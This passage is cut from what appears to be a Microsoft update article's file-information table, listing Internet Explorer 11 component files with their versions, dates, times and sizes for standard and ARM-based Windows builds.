11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.20038| 17-May-2021| 23:58| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.20038| 17-May-2021| 23:57| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.20038| 17-May-2021| 21:39| 4,387,840 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20038| 17-May-2021| 23:58| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \niedkcs32.dll| 18.0.9600.20038| 17-May-2021| 21:49| 333,312 \ninstall.ins| Not versioned| 17-May-2021| 20:00| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.20038| 17-May-2021| 21:28| 710,656 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \niedvtool.dll| 11.0.9600.20038| 17-May-2021| 22:47| 772,608 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.20038| 17-May-2021| 21:32| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.20038| 17-May-2021| 22:19| 2,308,608 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.20038| 17-May-2021| 23:58| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \ninetcomm.dll| 6.3.9600.20038| 17-May-2021| 21:54| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \n \n### \n\n__\n\nInternet Explorer 11 on all supported ARM-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20038| 17-May-2021| 21:10| 1,064,960 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:30| 68,608 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 47,616 \nurlmon.dll| 11.0.9600.20038| 17-May-2021| 21:02| 1,035,776 \niexplore.exe| 11.0.9600.19867| 12-Oct-2020| 22:01| 807,816 \nWininetPlugin.dll| 6.3.9600.16384| 21-Aug-2013| 19:52| 33,792 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 10:19| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:10| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.20038| 17-May-2021| 22:43| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nhtml.iec| 2019.0.0.20038| 17-May-2021| 21:41| 320,000 \ninetcpl.cpl| 11.0.9600.20038| 17-May-2021| 21:18| 2,007,040 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 307,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,888 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,304 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,008 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 303,104 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:16| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 283,648 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 291,840 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,520 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,376 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 258,048 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 256,512 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 288,256 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 285,184 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 297,472 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,816 \nmshtml.dll.mui| 11.0.9600.20038| 17-May-2021| 22:43| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 281,600 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 286,720 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 292,352 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 242,176 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 18:39| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:28| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 68,608 \nF12Resources.dll.mui| 11.0.9600.20038| 17-May-2021| 22:43| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:03| 63,488 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:04| 215,552 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 10:09| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:54| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.20038| 17-May-2021| 22:43| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:59| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 35,328 \nwininet.dll| 11.0.9600.20038| 17-May-2021| 21:01| 4,147,712 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 19:43| 39,936 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18698| 14-May-2017| 12:41| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 